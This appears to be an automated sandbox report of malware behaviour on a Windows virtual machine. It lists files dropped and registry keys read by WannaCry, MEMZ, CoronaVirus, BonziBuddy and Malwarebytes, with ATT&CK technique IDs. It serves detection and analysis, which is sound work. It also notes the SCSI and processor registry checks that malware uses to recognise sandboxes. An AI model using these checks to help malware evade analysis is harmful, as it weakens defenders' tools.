File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8187bv64.inf_amd64_bc859d32f3e2f0d5\net8187bv64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlane.inf_amd64_20caba88bd7f0bb3\netrtwlane.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_amd64_3294fc34256dbb0e\dc21x4vm.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ndisimplatformmp.inf_amd64_8de1181bfd1f1628\ndisimplatformmp.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8192se64.inf_amd64_167684f9283b4eca\net8192se64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\Temp\{7e9a13ab-3fe2-ac45-846b-1259fb3ad446}\SET54EE.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\117308CCCD9C93758827D7CC85BB135E	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netsstpa.inf_amd64_e76c5387d67e3fd6\netsstpa.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netl1c63x64.inf_amd64_4d6630ce07a4fb42\netl1c63x64.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7e9a13ab-3fe2-ac45-846b-1259fb3ad446}\SET54ED.tmp	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAEBE581FCB73249406FC21094EA252E_BC0CE803EF41A748738619ED7838EEFC	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\206742EA5671D0AFB286434AEACBAD29	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Malwarebytes\Logs\MBAMSI.alt1.log	MBAMWsc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0F7456FD78DEB390E51DB22FDEB14606	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwlv64.inf_amd64_0b9818131664d91e\netwlv64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netefe3e.inf_amd64_7830581a689ef40d\netefe3e.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\bthpan.inf_amd64_b06c3bc32f7db374\bthpan.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlanu.inf_amd64_1815bafd14dc59f0\netrtwlanu.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netjme.inf_amd64_752bf22f1598bb7e\netjme.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Malwarebytes\Logs\MBAMSI.alt1.log	MBAMService.exe
File created	C:\Windows\SysWOW64\SETFE7E.tmp	tv_enua.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwtw04.inf_amd64_c8f5ae6576289a2d\netwtw04.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrndis.inf_amd64_be4ba6237d385e2e\netrndis.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mrvlpcie8897.inf_amd64_07fc330c5a5730ca\mrvlpcie8897.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netr7364.inf_amd64_310ee0bc0af86ba3\netr7364.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.inf	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9EC3B71635F8BA3FC68DE181A104A0EF_10CFC0D4C45D2E76B7EA49C8C22BEDFE	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\206742EA5671D0AFB286434AEACBAD29	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msux64w10.inf_amd64_5aa81644af5957b3\msux64w10.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8192su64.inf_amd64_66c8bfc7a4b1feed\net8192su64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mwlu97w8x64.inf_amd64_23bc3dc6d91eebdc\mwlu97w8x64.PNF	MBVpnTunnelService.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WannaCry.EXE@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Program Files directory 64 IoCs

Processes:

MBAMInstallerService.exeBonziBuddy432.exeMBAMService.exeBonziBDY_35.EXEMBSetup.exe

description	ioc	process
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\de\System.Xaml.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\ReachFramework.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Threading.AccessControl.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-processthreads-l1-1-0.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\msvbvm60.dll	BonziBuddy432.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Diagnostics.TraceSource.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\fr\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Transactions.Local.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.inf	MBAMService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\MSAGENTS\Bonzi.acs	BonziBuddy432.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ko\System.Windows.Forms.Primitives.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationFramework-SystemXmlLinq.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\ActionsShim.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\Prism.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Net.Sockets.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Text.Encoding.Extensions.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\de\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\es\UIAutomationClientSideProviders.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Net.WebSockets.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\wpfgfx_cor3.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\SSCALA32.OCX	BonziBuddy432.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ko\UIAutomationProvider.resources.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Apps.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\p001.nbd	BonziBuddy432.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Drawing.Primitives.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\es\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\CleanControllerImpl.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Reg.nbd	BonziBDY_35.EXE
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Diagnostics.StackTrace.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\AEControllerImpl.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\Microsoft.Extensions.Caching.Memory.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\f08d41523fb011ef997ceefa7036a957	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-datetime-l1-1-0.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.AppContext.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\pl\System.Xaml.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\assistant.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json.bak	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\MbamUI.Core.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\MbamUI.Tray.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\j2.nbd-SR	BonziBuddy432.exe
File created	C:\Program Files (x86)\mbamtestfile.dat	MBSetup.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Memory.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\pl\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Security.Cryptography.Pkcs.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-crt-math-l1-1-0.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\pt-BR\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hans\Microsoft.VisualBasic.Forms.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\BrowserSDKDLLShim.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\System.Windows.Controls.Ribbon.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\sdk\mwac.cat	MBAMService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hans\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\Prism.Wpf.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page0.jpg	BonziBuddy432.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\Microsoft.Win32.Primitives.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Threading.ThreadPool.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationCore.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ru\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Security.SecureString.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\createdump.exe	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\pl\PresentationUI.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\UIAutomationClient.dll	MBAMInstallerService.exe

Drops file in Windows directory 61 IoCs

Processes:

DrvInst.exeMSAGENT.EXEtv_enua.exesvchost.exeBonziBuddy432.exeMBVpnTunnelService.exe

description	ioc	process
File opened for modification	C:\Windows\inf\oem3.inf	DrvInst.exe
File opened for modification	C:\Windows\msagent\AgentPsh.dll	MSAGENT.EXE
File opened for modification	C:\Windows\fonts\SETFE6C.tmp	tv_enua.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\msagent\AgentDPv.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETFAA3.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETFAC6.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETFAD8.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\mslwvtts.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\chars\Peedy.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\msagent\AgentMPx.dll	MSAGENT.EXE
File created	C:\Windows\INF\SETFE6D.tmp	tv_enua.exe
File created	C:\Windows\msagent\SETFAA4.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSR.dll	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	tv_enua.exe
File opened for modification	C:\Windows\msagent\SETFA93.tmp	MSAGENT.EXE
File created	C:\Windows\lhsp\tv\SETFE69.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\tv\tv_enua.dll	tv_enua.exe
File opened for modification	C:\Windows\msagent\SETFAA4.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\SETFAD7.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETFAEB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\setupapi.dev.log	MBVpnTunnelService.exe
File created	C:\Windows\lhsp\help\SETFE6B.tmp	tv_enua.exe
File created	C:\Windows\msagent\SETFAA3.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentAnm.dll	MSAGENT.EXE
File created	C:\Windows\msagent\intl\SETFAEA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETFAC6.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\Agt0409.hlp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\SETFAEA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\SETFE6B.tmp	tv_enua.exe
File opened for modification	C:\Windows\fonts\andmoipa.ttf	tv_enua.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	C:\Windows\msagent\SETFAA5.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\SETFE6D.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\tv\SETFE69.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\chars\Bonzi.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\msagent\SETFA92.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentDp2.dll	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\tv\SETFE6A.tmp	tv_enua.exe
File created	C:\Windows\msagent\SETFA93.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETFAA6.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETFAD8.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgtCtl15.tlb	MSAGENT.EXE
File created	C:\Windows\msagent\SETFA91.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentCtl.dll	MSAGENT.EXE
File created	C:\Windows\help\SETFAD9.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSvr.exe	MSAGENT.EXE
File created	C:\Windows\INF\SETFAD7.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\agtinst.inf	MSAGENT.EXE
File created	C:\Windows\lhsp\tv\SETFE6A.tmp	tv_enua.exe
File created	C:\Windows\fonts\SETFE6C.tmp	tv_enua.exe
File opened for modification	C:\Windows\INF\tv_enua.inf	tv_enua.exe
File opened for modification	C:\Windows\msagent\SETFAA5.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETFAA6.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETFAEB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\tv_enua.hlp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SETFA91.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETFA92.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\SETFAD9.tmp	MSAGENT.EXE

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\chromedrivers.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

864 2936 WerFault.exe sspcss.exe
3428 2552 WerFault.exe MEMZ.exe
3640 8172 WerFault.exe CoronaVirus.exe

pid	pid_target	process	target process
864	2936	WerFault.exe	sspcss.exe
3428	2552	WerFault.exe	MEMZ.exe
3640	8172	WerFault.exe	CoronaVirus.exe

Checks SCSI registry key(s) 3 TTPs 29 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exeDrvInst.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	DrvInst.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sspcss.exeMBAMService.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sspcss.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MBAMService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MBAMService.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sspcss.exe

Enumerates system info in registry 2 TTPs 32 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exechrome.exechrome.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
